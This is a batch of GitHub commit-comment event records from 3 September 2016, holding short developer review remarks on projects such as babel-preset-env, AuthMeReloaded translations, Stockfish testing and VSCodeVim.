{"id":"4512566242","type":"CommitCommentEvent","actor":{"login":"tsvetomirivanovv"},"repo":{"name":"tsvetomirivanovv/MyApplication2"},"payload":{"comment":{"id":18890792,"position":5,"line":30,"path":"app/src/main/java/com/example/tsvetomir/myapplication/MainActivity.java","commit_id":"cc0535a45678f60e964ed52fd8a053575ebf70ef","created_at":"2016-09-03T18:35:53Z","updated_at":"2016-09-03T18:35:53Z","body":"s"}},"created_at":"2016-09-03T18:35:53Z"}
{"id":"4512566268","type":"CommitCommentEvent","actor":{"login":"tsvetomirivanovv"},"repo":{"name":"tsvetomirivanovv/MyApplication2"},"payload":{"comment":{"id":18890793,"position":6,"line":31,"path":"app/src/main/java/com/example/tsvetomir/myapplication/MainActivity.java","commit_id":"cc0535a45678f60e964ed52fd8a053575ebf70ef","created_at":"2016-09-03T18:35:54Z","updated_at":"2016-09-03T18:35:54Z","body":"s"}},"created_at":"2016-09-03T18:35:54Z"}
{"id":"4512566845","type":"CommitCommentEvent","actor":{"login":"milesj"},"repo":{"name":"babel/babel-preset-env"},"payload":{"comment":{"id":18890794,"position":1,"line":1,"path":"src/plugins.js","commit_id":"e2b00b5d6dcb93c3ef1517171790ba871963aa0f","created_at":"2016-09-03T18:36:17Z","updated_at":"2016-09-03T18:36:17Z","body":"Interesting approach. I'm not sure if it's better to have a central location for all the target configurations, or having the configuration in each package separately, like a `targets.json` file.\r\n\r\nThis approach (currently) does not seem to allow third-party plugins to define target configurations."}},"created_at":"2016-09-03T18:36:17Z"}
{"id":"4512567172","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"krexus-caf/system_core"},"payload":{"comment":{"id":18890795,"position":null,"line":null,"path":null,"commit_id":"95ad4957eaf348c5b0f825e88ffb8642ca0f4770","created_at":"2016-09-03T18:36:34Z","updated_at":"2016-09-03T18:36:34Z","body":"i used to build aosp-caf for LG G3 and since the rebase it causes a bootloop\r\nkrexus-caf is booting fine and i am comparing the differences between these.\r\naosp-caf does not have this commit.\r\ndo you have any clue what aosp-caf is missing compared to your krexus-caf?"}},"created_at":"2016-09-03T18:36:34Z"}
{"id":"4512567595","type":"CommitCommentEvent","actor":{"login":"gt2010"},"repo":{"name":"gt2010/gt-test"},"payload":{"comment":{"id":18890796,"position":null,"line":null,"path":null,"commit_id":"706a4a36544691ff0bcb60b03e059ecc5f5bb1e4","created_at":"2016-09-03T18:36:56Z","updated_at":"2016-09-03T18:36:56Z","body":"JJ test#"}},"created_at":"2016-09-03T18:36:56Z"}
{"id":"4512569254","type":"CommitCommentEvent","actor":{"login":"milesj"},"repo":{"name":"babel/babel-preset-env"},"payload":{"comment":{"id":18890798,"position":199,"line":55,"path":"src/index.js","commit_id":"e2b00b5d6dcb93c3ef1517171790ba871963aa0f","created_at":"2016-09-03T18:38:15Z","updated_at":"2016-09-03T18:38:15Z","body":"Should probably use `semver` as to support browser versions that rely on minor numbers, like Safari."}},"created_at":"2016-09-03T18:38:15Z"}
{"id":"4512569300","type":"CommitCommentEvent","actor":{"login":"sakopzon"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18890799,"position":null,"line":null,"path":null,"commit_id":"b4f6d4422f258aa7cf944cb18928f83b63a4ce25","created_at":"2016-09-03T18:38:17Z","updated_at":"2016-09-03T18:38:17Z","body":"working on it"}},"created_at":"2016-09-03T18:38:17Z"}
{"id":"4512569369","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"ice41/AuthMeReloaded"},"payload":{"comment":{"id":18890801,"position":15,"line":59,"path":"src/main/resources/messages/messages_pt.yml","commit_id":"e8717ba07619afa8d24b27c5bd07af7ba4f407c3","created_at":"2016-09-03T18:38:21Z","updated_at":"2016-09-03T18:38:21Z","body":"Não é o proprietário da conta. Por favor, escolha outro nome!"}},"created_at":"2016-09-03T18:38:21Z"}
{"id":"4512569764","type":"CommitCommentEvent","actor":{"login":"noahbass"},"repo":{"name":"Bearcat-Hackers/RevolutionUC-Website"},"payload":{"comment":{"id":18890802,"position":null,"line":null,"path":null,"commit_id":"9ef735c4cbdbc806ee80a689a271a7aac2a7bd91","created_at":"2016-09-03T18:38:39Z","updated_at":"2016-09-03T18:38:39Z","body":"The CEAS tribunal logo on [224](https://github.com/Bearcat-Hackers/RevolutionUC-Website/commit/9ef735c4cbdbc806ee80a689a271a7aac2a7bd91#diff-e249faefed5757034596c5096d33dab6L224) looks super shrunken (in width). We should look for another tribunal logo to use."}},"created_at":"2016-09-03T18:38:39Z"}
{"id":"4512570105","type":"CommitCommentEvent","actor":{"login":"cajund"},"repo":{"name":"gmu-mis-412/daves_donuts"},"payload":{"comment":{"id":18890805,"position":5,"line":6,"path":"www/index.html","commit_id":"f6d8abadaa854071cde277bac27b684c2ace0f76","created_at":"2016-09-03T18:38:53Z","updated_at":"2016-09-03T18:38:53Z","body":"Inline Comment"}},"created_at":"2016-09-03T18:38:53Z"}
{"id":"4512570899","type":"CommitCommentEvent","actor":{"login":"busterb"},"repo":{"name":"kgardas/openbsd-src"},"payload":{"comment":{"id":18890808,"position":null,"line":null,"path":null,"commit_id":"e717de263adbeeba34723e6b21cf31b4237aa254","created_at":"2016-09-03T18:39:28Z","updated_at":"2016-09-03T18:39:28Z","body":"Sorry, I meant to type it as beck@ :P"}},"created_at":"2016-09-03T18:39:28Z"}
{"id":"4512570998","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"ice41/AuthMeReloaded"},"payload":{"comment":{"id":18890809,"position":16,"line":60,"path":"src/main/resources/messages/messages_pt.yml","commit_id":"e8717ba07619afa8d24b27c5bd07af7ba4f407c3","created_at":"2016-09-03T18:39:32Z","updated_at":"2016-09-03T18:39:32Z","body":"'&2O seu código secreto é o %code. Pode verificá-lo a partir daqui %url'"}},"created_at":"2016-09-03T18:39:32Z"}
{"id":"4512571617","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"ice41/AuthMeReloaded"},"payload":{"comment":{"id":18890810,"position":17,"line":61,"path":"src/main/resources/messages/messages_pt.yml","commit_id":"e8717ba07619afa8d24b27c5bd07af7ba4f407c3","created_at":"2016-09-03T18:40:04Z","updated_at":"2016-09-03T18:40:04Z","body":"'&4O endereço de e-mail já está sendo usado'"}},"created_at":"2016-09-03T18:40:04Z"}
{"id":"4512571724","type":"CommitCommentEvent","actor":{"login":"mssmalle"},"repo":{"name":"zachlittle/sourceclub"},"payload":{"comment":{"id":18890811,"position":null,"line":null,"path":null,"commit_id":"a4f9d891591519eb3d64d3ab25c398c957cb3dfe","created_at":"2016-09-03T18:40:10Z","updated_at":"2016-09-03T18:40:10Z","body":"#SkeetusMcTech #SMT #fuckingCousinsAndCodingSince5"}},"created_at":"2016-09-03T18:40:10Z"}
{"id":"4512573717","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"ice41/AuthMeReloaded"},"payload":{"comment":{"id":18890816,"position":18,"line":62,"path":"src/main/resources/messages/messages_pt.yml","commit_id":"e8717ba07619afa8d24b27c5bd07af7ba4f407c3","created_at":"2016-09-03T18:41:40Z","updated_at":"2016-09-03T18:41:40Z","body":"# TODO denied_command: '&cPara utilizar este comando é necessário estar Logado!'"}},"created_at":"2016-09-03T18:41:40Z"}
{"id":"4512573898","type":"CommitCommentEvent","actor":{"login":"LaChal"},"repo":{"name":"Khroki/MCEdit-Unified"},"payload":{"comment":{"id":18890817,"position":null,"line":null,"path":null,"commit_id":"3ff4add9ce71b3c3e52bd216c769c2eb54facd45","created_at":"2016-09-03T18:41:46Z","updated_at":"2016-09-03T18:41:46Z","body":"@OniOniOn-           @violine1101 @L3ice @Neui @MG-5 @vongola12324 @fhfuih      @Monkey0x9 @TropicSapling\r\nThe translations has been updated. Please mind to have a look :smile:"}},"created_at":"2016-09-03T18:41:46Z"}
{"id":"4512574365","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"ice41/AuthMeReloaded"},"payload":{"comment":{"id":18890818,"position":19,"line":63,"path":"src/main/resources/messages/messages_pt.yml","commit_id":"e8717ba07619afa8d24b27c5bd07af7ba4f407c3","created_at":"2016-09-03T18:42:09Z","updated_at":"2016-09-03T18:42:09Z","body":"# TODO same_ip_online: 'Um jogador com o mesmo IP já está conectado no servidor'"}},"created_at":"2016-09-03T18:42:09Z"}
{"id":"4512575336","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"ice41/AuthMeReloaded"},"payload":{"comment":{"id":18890819,"position":20,"line":64,"path":"src/main/resources/messages/messages_pt.yml","commit_id":"e8717ba07619afa8d24b27c5bd07af7ba4f407c3","created_at":"2016-09-03T18:42:55Z","updated_at":"2016-09-03T18:42:55Z","body":"# TODO password_error_chars: '&4 Sua senha contém caracteres ilegais. caracteres permitidos: REG_EX'"}},"created_at":"2016-09-03T18:42:55Z"}
{"id":"4512575404","type":"CommitCommentEvent","actor":{"login":"ejlaw01"},"repo":{"name":"NewkirkS/Character-Generator"},"payload":{"comment":{"id":18890820,"position":null,"line":null,"path":null,"commit_id":"6f433fca0150a0b9afec8213f26960ee5daaae0d","created_at":"2016-09-03T18:42:58Z","updated_at":"2016-09-03T18:42:58Z","body":"Oh, I see now it was just missing that one :)"}},"created_at":"2016-09-03T18:42:58Z"}
{"id":"4512575967","type":"CommitCommentEvent","actor":{"login":"kevinmichaelchen"},"repo":{"name":"TeslaGov/joan"},"payload":{"comment":{"id":18890822,"position":16,"line":16,"path":"rampart-joan-hook/src/main/java/com/teslagov/joan/rampart/JoanRampartHook.java","commit_id":"237adfb4147508a55bfedb2db44022410d964dc7","created_at":"2016-09-03T18:43:25Z","updated_at":"2016-09-03T18:43:25Z","body":"See #8 "}},"created_at":"2016-09-03T18:43:25Z"}
{"id":"4512576374","type":"CommitCommentEvent","actor":{"login":"milesj"},"repo":{"name":"babel/babel-preset-env"},"payload":{"comment":{"id":18890825,"position":43,"line":43,"path":"README.md","commit_id":"548813e67d024dc4bd0f7b692f1ae57c6cf1d886","created_at":"2016-09-03T18:43:43Z","updated_at":"2016-09-03T18:43:43Z","body":"I feel like using `presets` as a configuration option for env targets seems a bit odd. Presets define pre-configured babel plugins, reducing the amount of packages to remember, while this does not do that. It's simply a mapping of env targets per plugin.\r\n\r\nI'm surprised this functionality isn't just part of the core.\r\n\r\n```\r\nrequire(\"babel-core\").transform(\"code\", {\r\n  presets: [\"es2015\"],\r\n  targets: { chrome: 50 }, // I only want to support chrome 50+\r\n});\r\n```"}},"created_at":"2016-09-03T18:43:43Z"}
{"id":"4512576591","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"ice41/AuthMeReloaded"},"payload":{"comment":{"id":18890826,"position":21,"line":65,"path":"src/main/resources/messages/messages_pt.yml","commit_id":"e8717ba07619afa8d24b27c5bd07af7ba4f407c3","created_at":"2016-09-03T18:43:54Z","updated_at":"2016-09-03T18:43:54Z","body":"# TODO denied_chat: '&cpara conversar no chat tem de estar logado primeiro!'"}},"created_at":"2016-09-03T18:43:54Z"}
{"id":"4512577036","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18890827,"position":null,"line":null,"path":null,"commit_id":"c8652adf992ea25f6890c7179f7f52d88fedcf61","created_at":"2016-09-03T18:44:12Z","updated_at":"2016-09-03T18:44:12Z","body":"You are doing well !\r\n\r\nUsing nodestime is not mandatory.\r\n\r\nThe time control 20+0.2 is fine if you use nodestime\r\nHere is an example how to use nodestime:\r\nhttp://tests.stockfishchess.org/tests/view/55b588db0ebc590abbe1bd33\r\n\r\nTuning with nodestime 20 + 0.2 is equivalent to tune without nodestime 10 + 0.1\r\nMost people which do not use nodestime will therefore use 10 + 0.1, but using longer time control can be interesting for some special cases.\r\n\r\nHere you are using a longer 30 + 0.3. It is a bit time consuming, so you should change your throughput to 500. This way, you will leave more resources to other users.\r\nSo just go on http://tests.stockfishchess.org/tests/view/57cafec60ebc59030fbe4dfa\r\nand change throughput from 1000 to 500 , and click Modify.\r\n"}},"created_at":"2016-09-03T18:44:12Z"}
{"id":"4512577631","type":"CommitCommentEvent","actor":{"login":"ice41"},"repo":{"name":"ice41/AuthMeReloaded"},"payload":{"comment":{"id":18890828,"position":31,"line":69,"path":"src/main/resources/messages/messages_pt.yml","commit_id":"e8717ba07619afa8d24b27c5bd07af7ba4f407c3","created_at":"2016-09-03T18:44:41Z","updated_at":"2016-09-03T18:44:41Z","body":"# TODO invalid_name_case: 'Deve se juntar usando nome de usuário %valid, não %invalid.'"}},"created_at":"2016-09-03T18:44:41Z"}
{"id":"4512579969","type":"CommitCommentEvent","actor":{"login":"leoliu1313"},"repo":{"name":"codepath-project-stories/timeline"},"payload":{"comment":{"id":18890836,"position":null,"line":null,"path":null,"commit_id":"5c68cc16a19df6b9118dda4cf7375953c748fe07","created_at":"2016-09-03T18:46:29Z","updated_at":"2016-09-03T18:46:29Z","body":"Try to fix the weird behavior on my phone. Now it doesn't even work on SDK\n22.\nOn Sep 3, 2016 10:37 AM, \"Marina Tanasyuk\" <notifications@github.com> wrote:\n\n> Why do we target version \"24\"? @leoliu1313 <https://github.com/leoliu1313>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/codepath-project-stories/timeline/commit/5c68cc16a19df6b9118dda4cf7375953c748fe07#commitcomment-18890630>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACgtw37MdJ1gbmHnc0TOgdA3nDva3K4Rks5qmbA9gaJpZM4J0WgI>\n> .\n>\n"}},"created_at":"2016-09-03T18:46:29Z"}
{"id":"4512580115","type":"CommitCommentEvent","actor":{"login":"mhsjlw"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18890837,"position":null,"line":null,"path":null,"commit_id":"b97f4c3133d4df4a78e276d2ca3fcddc808de260","created_at":"2016-09-03T18:46:36Z","updated_at":"2016-09-03T18:46:36Z","body":"Chunk removal?"}},"created_at":"2016-09-03T18:46:36Z"}
{"id":"4512580656","type":"CommitCommentEvent","actor":{"login":"NightMoon032"},"repo":{"name":"OneKeyToWin/LeagueRepo"},"payload":{"comment":{"id":18890838,"position":null,"line":null,"path":null,"commit_id":"9b8bc7ba81b5da83af1d126eb21210870040c20a","created_at":"2016-09-03T18:47:02Z","updated_at":"2016-09-03T18:47:02Z","body":"this is not Exory Prediction! Dont scam us ! Exory Make In 2089~"}},"created_at":"2016-09-03T18:47:02Z"}
{"id":"4512582536","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18890840,"position":null,"line":null,"path":null,"commit_id":"b97f4c3133d4df4a78e276d2ca3fcddc808de260","created_at":"2016-09-03T18:48:33Z","updated_at":"2016-09-03T18:48:33Z","body":"@mhsjlw when client changes their render distance"}},"created_at":"2016-09-03T18:48:33Z"}
{"id":"4512584890","type":"CommitCommentEvent","actor":{"login":"zanalog"},"repo":{"name":"zanalog/TESTE-GIT"},"payload":{"comment":{"id":18890844,"position":8,"line":6,"path":"VIDEO.txt","commit_id":"1343a46a99c30e7996d78a2b3beb7c6231bd5a22","created_at":"2016-09-03T18:50:31Z","updated_at":"2016-09-03T18:50:31Z","body":"22222"}},"created_at":"2016-09-03T18:50:31Z"}
{"id":"4512585071","type":"CommitCommentEvent","actor":{"login":"M4LuZ"},"repo":{"name":"Shawn8901/lansuite"},"payload":{"comment":{"id":18890845,"position":null,"line":null,"path":null,"commit_id":"36e05e15cc7089c9bd10564c3a233d2e845a09a1","created_at":"2016-09-03T18:50:40Z","updated_at":"2016-09-03T18:50:40Z","body":"Moin,\r\nhab mir da auch schon mal ein paar Gedanken drüber gemacht.\r\n\r\nSehe leider noch ein paar Probleme:\r\nZum einen gibt es immer noch Probleme mit dem API-Limit, wenn mehrere Nutzer die Karte parallel aufrufen. \r\nZum anderen dumpt das Script (auch aktuell) alle gespeicherten Nutzerdaten im Klartext in den Quelltext. \r\nNicht gerade die beste Datenschutzpraxis,.\r\n\r\nDenke es würde daher  Sinn machen, die zurückgelieferten Location nach dem ersten Aufruf zu speichern und dann wieder zu verwenden. Reduziert die API-Aufrufe und Benutzerdaten-Leaks.\r\n\r\nPremium wäre natürlich die Integration als Hook in den usermanager (so dass es keine Probleme gibt, wenn das guestlist-Modul nicht aktiviert ist), so dass die Location automatisch bei Registrierung oder Adressänderung abgerufen und gespeichert wird.\r\n\r\nAlternativ hatte ich überlegt, eine entsprechende Geolocation-DB von openstreetmaps zu verwenden. Damit leaken wir gar keine Daten, aber müssten die Overlay-Funktionalität selber basteln\r\n"}},"created_at":"2016-09-03T18:50:40Z"}
{"id":"4512585952","type":"CommitCommentEvent","actor":{"login":"joachifm"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18890847,"position":null,"line":null,"path":null,"commit_id":"a6670c1a0b8cda8235296900cff950f39f60cf4f","created_at":"2016-09-03T18:51:21Z","updated_at":"2016-09-03T18:51:21Z","body":"On my system  the setuid-wrappers directory ends up being inaccessible to ordinary users"}},"created_at":"2016-09-03T18:51:21Z"}
{"id":"4512586259","type":"CommitCommentEvent","actor":{"login":"zanalog"},"repo":{"name":"zanalog/TESTE-GIT"},"payload":{"comment":{"id":18890848,"position":8,"line":6,"path":"VIDEO.txt","commit_id":"1343a46a99c30e7996d78a2b3beb7c6231bd5a22","created_at":"2016-09-03T18:51:34Z","updated_at":"2016-09-03T18:51:34Z","body":"adicionando"}},"created_at":"2016-09-03T18:51:34Z"}
{"id":"4512586409","type":"CommitCommentEvent","actor":{"login":"karatebuilderboy"},"repo":{"name":"karatebuilderboy/Launcher"},"payload":{"comment":{"id":18890849,"position":null,"line":null,"path":null,"commit_id":"8ecec369499d2a6336e35c438b23a03e181f734b","created_at":"2016-09-03T18:51:41Z","updated_at":"2016-09-03T18:51:41Z","body":"Thanks! Would you mind?"}},"created_at":"2016-09-03T18:51:41Z"}
{"id":"4512590097","type":"CommitCommentEvent","actor":{"login":"wscherer420"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":18890859,"position":null,"line":null,"path":null,"commit_id":"5d5197d79079153847f41ea61efb81e32043329e","created_at":"2016-09-03T18:54:39Z","updated_at":"2016-09-03T18:54:39Z","body":"It looks like the casting messages section was removed from the base file?  If placed elsewhere i think the Necro casting \"you mutter blasphemies to yourself\" may have been left out because the my characters spells aren't casting again.  "}},"created_at":"2016-09-03T18:54:39Z"}
{"id":"4512591289","type":"CommitCommentEvent","actor":{"login":"burak13"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18890861,"position":null,"line":null,"path":null,"commit_id":"340b8e447e859d2d9f39230393a55745c045d848","created_at":"2016-09-03T18:55:34Z","updated_at":"2016-09-03T18:55:34Z","body":"There is still a chance to recover a bit, and it isn't a clear regression at the moment. 32 threads test is going well btw."}},"created_at":"2016-09-03T18:55:34Z"}
{"id":"4512591400","type":"CommitCommentEvent","actor":{"login":"maximn"},"repo":{"name":"maximn/google-maps"},"payload":{"comment":{"id":18890862,"position":54,"line":45,"path":"GoogleMapsApi/Entities/Geocoding/Request/GeocodingComponents.cs","commit_id":"7350607c62a2b1c72f5969fc1053f2f4680154af","created_at":"2016-09-03T18:55:40Z","updated_at":"2016-09-03T18:55:40Z","body":"Will this play nicely? Maybe better empty string?"}},"created_at":"2016-09-03T18:55:40Z"}
{"id":"4512591480","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-tbc"},"payload":{"comment":{"id":18890864,"position":40,"line":3651,"path":"src/game/SpellEffects.cpp","commit_id":"92e53ef31316d9263fe639f9e5116cbecd3ac460","created_at":"2016-09-03T18:55:44Z","updated_at":"2016-09-03T18:55:44Z","body":"but we probably want an else to this so that other pets summoned by items that are not engineering trinkets (other engineering guardians, quest rewards, event guardians as the yeti thing, etc) don't scale with the player's level but rather selects its level from the db, perhaps from a range if such items summoned by guardians existed.\r\n\r\nWell, you don't really have to take care of this, I can look into it along with the other pet work I wanna be doing once the cores are all synced up."}},"created_at":"2016-09-03T18:55:44Z"}
{"id":"4512593672","type":"CommitCommentEvent","actor":{"login":"maximn"},"repo":{"name":"maximn/google-maps"},"payload":{"comment":{"id":18890866,"position":46,"line":39,"path":"GoogleMapsApi/Entities/Geocoding/Request/GeocodingComponents.cs","commit_id":"7350607c62a2b1c72f5969fc1053f2f4680154af","created_at":"2016-09-03T18:57:18Z","updated_at":"2016-09-03T18:57:18Z","body":"maybe something like\r\nstring.Join(\"|\", compoments.Select(x => x.Key + \":\" + x.Value)\r\n\r\nWhat do you think?"}},"created_at":"2016-09-03T18:57:18Z"}
{"id":"4512594520","type":"CommitCommentEvent","actor":{"login":"Erfan3318"},"repo":{"name":"Erfan3318/Erfan"},"payload":{"comment":{"id":18890868,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-03T18:58:01Z","updated_at":"2016-09-03T18:58:01Z","body":"121359031"}},"created_at":"2016-09-03T18:58:01Z"}
{"id":"4512594567","type":"CommitCommentEvent","actor":{"login":"maximn"},"repo":{"name":"maximn/google-maps"},"payload":{"comment":{"id":18890869,"position":7,"line":7,"path":"GoogleMapsApi/Entities/Geocoding/Request/GeocodingComponents.cs","commit_id":"7350607c62a2b1c72f5969fc1053f2f4680154af","created_at":"2016-09-03T18:58:05Z","updated_at":"2016-09-03T18:58:05Z","body":"private?"}},"created_at":"2016-09-03T18:58:05Z"}
{"id":"4512594916","type":"CommitCommentEvent","actor":{"login":"helfer"},"repo":{"name":"DxCx/graphql-tools"},"payload":{"comment":{"id":18890870,"position":16,"line":16,"path":"index.d.ts","commit_id":"0b955e4e8c58f3d49c0f35939c037223d79428fc","created_at":"2016-09-03T18:58:22Z","updated_at":"2016-09-03T18:58:22Z","body":"args are an object with string keys, not an array. And the fourth argument `info: any` is missing."}},"created_at":"2016-09-03T18:58:22Z"}
{"id":"4512596643","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":18890871,"position":null,"line":null,"path":null,"commit_id":"5d5197d79079153847f41ea61efb81e32043329e","created_at":"2016-09-03T18:59:45Z","updated_at":"2016-09-03T18:59:45Z","body":"It was moved from `base.yaml` to `base-spells.yaml`. Try restarting dependency."}},"created_at":"2016-09-03T18:59:45Z"}
{"id":"4512596816","type":"CommitCommentEvent","actor":{"login":"LiquitoX"},"repo":{"name":"LiquitoX/PingTestApp"},"payload":{"comment":{"id":18890872,"position":156,"line":146,"path":"PingApp/PingApp/Form1.cs","commit_id":"1b2d69a91a7b2dde3b3c2c7d661768d1794ae2ab","created_at":"2016-09-03T18:59:53Z","updated_at":"2016-09-03T18:59:53Z","body":"This involves an bug. The textboxes need to be replaced with numeric boxes, but then you lose the capability to jump to the next field"}},"created_at":"2016-09-03T18:59:53Z"}
{"id":"4512596876","type":"CommitCommentEvent","actor":{"login":"xconverge"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":18890873,"position":null,"line":null,"path":null,"commit_id":"660df9aa65fbaa558c6c52541cfb2e618e856c96","created_at":"2016-09-03T18:59:57Z","updated_at":"2016-09-03T18:59:57Z","body":"@aminroosta I think this broke undo\r\n\r\nthe undo tests pass but if you open an editor and type something then press \"u\" it doesn't work. I did a git reset --hard to the commit before this and undo works."}},"created_at":"2016-09-03T18:59:57Z"}
{"id":"4512597032","type":"CommitCommentEvent","actor":{"login":"antoniorosario"},"repo":{"name":"antoniorosario/sleep-smarter"},"payload":{"comment":{"id":18890874,"position":null,"line":null,"path":null,"commit_id":"95578de9f976cd9391ec7b52ef94d0b738f37b74","created_at":"2016-09-03T19:00:08Z","updated_at":"2016-09-03T19:00:08Z","body":"Commit should be \"Update README.md\"."}},"created_at":"2016-09-03T19:00:08Z"}
{"id":"4512597549","type":"CommitCommentEvent","actor":{"login":"Arinerron"},"repo":{"name":"karatebuilderboy/Launcher"},"payload":{"comment":{"id":18890875,"position":null,"line":null,"path":null,"commit_id":"8ecec369499d2a6336e35c438b23a03e181f734b","created_at":"2016-09-03T19:00:23Z","updated_at":"2016-09-03T19:00:23Z","body":"@karatebuilderboy Alrighty. What would you like to see a sample of?"}},"created_at":"2016-09-03T19:00:23Z"}
{"id":"4512597827","type":"CommitCommentEvent","actor":{"login":"maximn"},"repo":{"name":"maximn/google-maps"},"payload":{"comment":{"id":18890876,"position":38,"line":48,"path":"GoogleMapsApi/Entities/Geocoding/Request/GeocodingComponents.cs","commit_id":"94fc7d534e8390a3997a17f4e140f8c648a2bf7d","created_at":"2016-09-03T19:00:34Z","updated_at":"2016-09-03T19:00:34Z","body":"why not private?\r\nThe default is internal"}},"created_at":"2016-09-03T19:00:34Z"}
{"id":"4512599607","type":"CommitCommentEvent","actor":{"login":"ral99"},"repo":{"name":"ral99/knuckleball"},"payload":{"comment":{"id":18890877,"position":null,"line":null,"path":null,"commit_id":"033b113a6d0371eaf5c1209a65772f326e2a5330","created_at":"2016-09-03T19:01:56Z","updated_at":"2016-09-03T19:01:56Z","body":"It was indeed not clear."}},"created_at":"2016-09-03T19:01:56Z"}
{"id":"4512602483","type":"CommitCommentEvent","actor":{"login":"aslakknutsen"},"repo":{"name":"almighty/almighty-ui"},"payload":{"comment":{"id":18890881,"position":7,"line":8,"path":"config/webpack.dev.js","commit_id":"7eeb20331b9342889d0e516e1ecb33e7a0101071","created_at":"2016-09-03T19:04:03Z","updated_at":"2016-09-03T19:04:03Z","body":"When I tested the same logic locally the result was;\r\n\r\nYes I can use API_URL if it's in Env, but if it's not, API_URL is 'undefined' ?"}},"created_at":"2016-09-03T19:04:03Z"}
{"id":"4512603224","type":"CommitCommentEvent","actor":{"login":"jpphaneuf"},"repo":{"name":"OperationCode/exercism-io-mentoring"},"payload":{"comment":{"id":18890882,"position":null,"line":null,"path":null,"commit_id":"a5e5d351b6deba2aa56f5e900d0ff5a11f9f4ee2","created_at":"2016-09-03T19:04:42Z","updated_at":"2016-09-03T19:04:42Z","body":"Looks good!"}},"created_at":"2016-09-03T19:04:42Z"}
{"id":"4512603665","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"TeslaRom-N/build"},"payload":{"comment":{"id":18890883,"position":null,"line":null,"path":null,"commit_id":"c06aae868b4cd9e5a1e32ec21fc12da1ccbb69b1","created_at":"2016-09-03T19:05:07Z","updated_at":"2016-09-03T19:05:07Z","body":"oooops"}},"created_at":"2016-09-03T19:05:07Z"}
{"id":"4512605292","type":"CommitCommentEvent","actor":{"login":"aminroosta"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":18890886,"position":null,"line":null,"path":null,"commit_id":"660df9aa65fbaa558c6c52541cfb2e618e856c96","created_at":"2016-09-03T19:06:22Z","updated_at":"2016-09-03T19:06:22Z","body":"@xconverge Thanks for finding this bug. I will investigate what's going on and i will send a PR.\r\n\r\nat mention @johnfn :-)"}},"created_at":"2016-09-03T19:06:22Z"}
{"id":"4512605305","type":"CommitCommentEvent","actor":{"login":"grubeninspekteur"},"repo":{"name":"grubeninspekteur/BetterRBTV"},"payload":{"comment":{"id":18890887,"position":null,"line":null,"path":null,"commit_id":"7f8107db4cec68b8b8c9757e5cb60344b865dad2","created_at":"2016-09-03T19:06:23Z","updated_at":"2016-09-03T19:06:23Z","body":"Can't work on it right now, but there are two useful functions getCaretPosition and setCaretPosition already implemented. Also, we have to be careful because of non-text nodes. See the code from the SuggestionBox replace function"}},"created_at":"2016-09-03T19:06:23Z"}
{"id":"4512608214","type":"CommitCommentEvent","actor":{"login":"GabrielVenezuela"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890891,"position":null,"line":null,"path":null,"commit_id":"b8fa87805d03875d20956843d80a3498038912b8","created_at":"2016-09-03T19:08:44Z","updated_at":"2016-09-03T19:08:44Z","body":"@FGDATA  ok ok thanks"}},"created_at":"2016-09-03T19:08:44Z"}
{"id":"4512608814","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890893,"position":7,"line":33,"path":"ficbot.js","commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:09:17Z","updated_at":"2016-09-03T19:09:17Z","body":"shouldn't have `var`"}},"created_at":"2016-09-03T19:09:17Z"}
{"id":"4512608996","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890894,"position":28,"line":43,"path":"ficbot.js","commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:09:27Z","updated_at":"2016-09-03T19:09:27Z","body":"Seems like \"associative array\" is the best term to use in JavaScript"}},"created_at":"2016-09-03T19:09:27Z"}
{"id":"4512609170","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18890895,"position":31,"line":46,"path":"ficbot.js","commit_id":"2ae7e088144e3e19c89afbe059130ec7a4fde851","created_at":"2016-09-03T19:09:35Z","updated_at":"2016-09-03T19:09:35Z","body":"Won't be found on line 76, `\"\\\\\\\\\" != \"\\\\\"`. The four backslashes are for escaping the javascript string and regex character. But when it matches and looks up \"\\\\\" in this dictionary, it will not be found. See bottom-most comment on commit."}},"created_at":"2016-09-03T19:09:35Z"}
